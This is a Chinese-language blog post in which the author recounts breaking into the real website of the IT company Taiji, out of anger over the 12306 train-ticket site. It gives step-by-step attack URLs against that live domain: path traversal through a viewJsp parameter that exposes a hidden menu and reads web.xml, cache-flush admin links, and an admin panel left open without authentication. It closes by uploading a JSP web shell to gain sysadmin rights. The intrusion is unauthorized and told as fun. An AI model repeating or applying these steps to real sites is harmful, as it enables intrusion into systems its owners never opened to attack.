国庆就要来了,返乡出行的高峰期来了,最近无论是身边还是网络上的都怨声载道啊,原因就是火车票,网上订票系统12306真是没话说了,大家都懂的!

于是最近大家都把气撒在了收1.99亿开发出这么个破网站的公司:“太极”身上,主页http://www.taiji.com.cn/

下面我就把过程写出来和大家分享。

打开主页的网址默认跳到了这个链接

http://www.taiji.com.cn/coboportal/portal/compayindex.ptview

鼠标随便停在新闻链接上状态栏显示如下,

clip_image002

http://www.taiji.com.cn/coboportal/portal/itservice.ptview?funcid=showGSWZInfoLink&infoSortId=52802&infoLinkId=13962&viewJsp=gswz/newsevents/newsshowcontent.jsp

试了试infoSortId=52802这里是木有注入的哦,不过看着viewjsp这个参数有点特别哦,后面直接接上相对路径真是jsp文件地址了,于是我们来试试包含漏洞或者任意文件下载漏洞~

构造如下地址:

http://www.taiji.com.cn/coboportal/portal/innovation.ptview?funcid=showGSWZInfoLink&infoSortId=53921&infoLinkId=13869%20&viewJsp=index.jsp

打开发现404如图:

clip_image004

继续构造,把viewJsp=index.jsp改为viewJsp=../index.jsp:

http://www.taiji.com.cn/coboportal/portal/innovation.ptview?funcid=showGSWZInfoLink&infoSortId=53921&infoLinkId=13869%20&viewJsp=../index.jsp

clip_image006

依然是404

继续~

http://www.taiji.com.cn/coboportal/portal/innovation.ptview?funcid=showGSWZInfoLink&infoSortId=53921&infoLinkId=13869%20&viewJsp=../../index.jsp

clip_image008

出来了个这个网页,这好像是个灰常低调的菜单导航,上面有后台的地址链接,还有清空系统缓存等功能

随便点点后台如图

clip_image010

又是404

http://www.taiji.com.cn/coboportal/portal/wafplatform/portletmanage.do?funcid=flushSessinoOsCache

去掉了/portal/wafplatform这两个目录也是打不开的,于是试到这的时候也是上面那个菜单导航

http://www.taiji.com.cn/coboportal/

clip_image011

这下可以直接点了到后台了

clip_image013

也可以清空缓存:

clip_image015

注意到地址如下

http://www.taiji.com.cn/coboportal/wafplatform/portletmanage.do?funcid=flushAllOsCache

http://www.taiji.com.cn/coboportal/wafplatform/portletmanage.do?funcid=flushSessinoOsCache

http://www.taiji.com.cn/coboportal/wafplatform/portletmanage.do?funcid=reloadCache

http://www.taiji.com.cn/coboportal/wafplatform/portalpagemanage.do?funcid=reloadCache

到这里我直接去试着弱口令登录后台了,不行!注入、万能密码什么的也过滤了的~

看来思路到这里就死了,

又随便试了下包含漏洞读取java 网站的配置文件web.xml看能不能读取出点什么

http://www.taiji.com.cn/coboportal/portal/innovation.ptview?funcid=showGSWZInfoLink&infoSortId=53921&infoLinkId=13869 &viewJsp=../../WEB-INF/web.xml

clip_image017

除了个内网IP敏感点其他没什么鸟信息可以利用``肿么办呢,于是先放一放 休息会咯

又翻啊翻,看网页源文件的时候找到个链接~

www.taiji.com.cn/coboportal/portal/portlet/gswz/iframediv.html

是敏感点 依然没什么用!

clip_image019

晚上的时候群里的兄弟们也讨论起这个站,这个好,终于找到基友了,但是根据截图来看他们已经进了后台了,我还在后台门口傻望着呢,肿么办呢,就去请教了下大牛,经过我的软磨硬泡嘘寒问暖关怀备至一番,原来大牛们在清空缓存那儿的链接直接就可以进去的!

怎么进呢,清空缓存的链接是http://www.taiji.com.cn/coboportal/wafplatform/portletmanage.do?funcid=flushAllOsCache

去掉?后面的参数http://www.taiji.com.cn/coboportal/wafplatform/portletmanage.do打开了直接就是后台,没有验证的,惭愧啊,我都不好意思直视大牛的双眼!

clip_image021

真是坑爹啊,难怪做出来的12306.cn风格都是一个样,就是坑爹!

进了后台随便找个添加新闻的上传个jsp,没过滤滴!这样就拿到大马了,sysadmin权限~

接下来的提权内网渗透就不玩了,小小滴娱乐一下就算了,剩下的还是留给大牛们玩去··

源链接

Hacking more

...